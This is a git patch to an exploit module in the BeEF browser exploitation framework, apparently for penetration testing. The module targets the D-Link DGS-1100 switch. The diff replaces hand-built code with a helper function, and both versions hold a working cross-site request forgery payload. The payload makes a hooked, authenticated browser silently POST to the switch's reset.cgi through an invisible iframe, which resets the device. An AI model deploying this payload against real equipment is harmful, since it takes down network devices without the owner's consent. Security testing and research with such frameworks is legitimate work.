From f3b797475c8bd08a8a9e7354230ef72c1ef9ded2 Mon Sep 17 00:00:00 2001
From: Nicholas Starke <starke.nicholas@gmail.com>
Date: Sat, 25 Feb 2017 08:08:37 -0600
Subject: [PATCH] Adjusting to use XsrfForm

---
 .../dlink_dgs_1100_device_reset/command.js    | 19 +++----------------
 1 file changed, 3 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
index b5164a929..6da6cccc5 100644
--- a/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_device_reset/command.js
@@ -8,22 +8,9 @@ beef.execute(function() {
   // Hooked browser must be authenticated to switch.
   var base = '<%= @base %>';
 
-  var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
-
-  var form = document.createElement('form');
-  form.setAttribute('action', base + "/cgi/reset.cgi");
-  form.setAttribute('method', 'POST');
-
-  var input = null;
-
-  input = document.createElement('input');
-  input.setAttribute('type', 'hidden');
-  input.setAttribute('name', 'reset');
-  input.setAttribute('value', 1);
-  form.appendChild(input);
-
-  dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
-  form.submit();
+  var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/reset.cgi', 'POST', 'application/x-www-form-urlencoded', [
+    { type: 'hidden', name: 'reset', value: 1 }
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");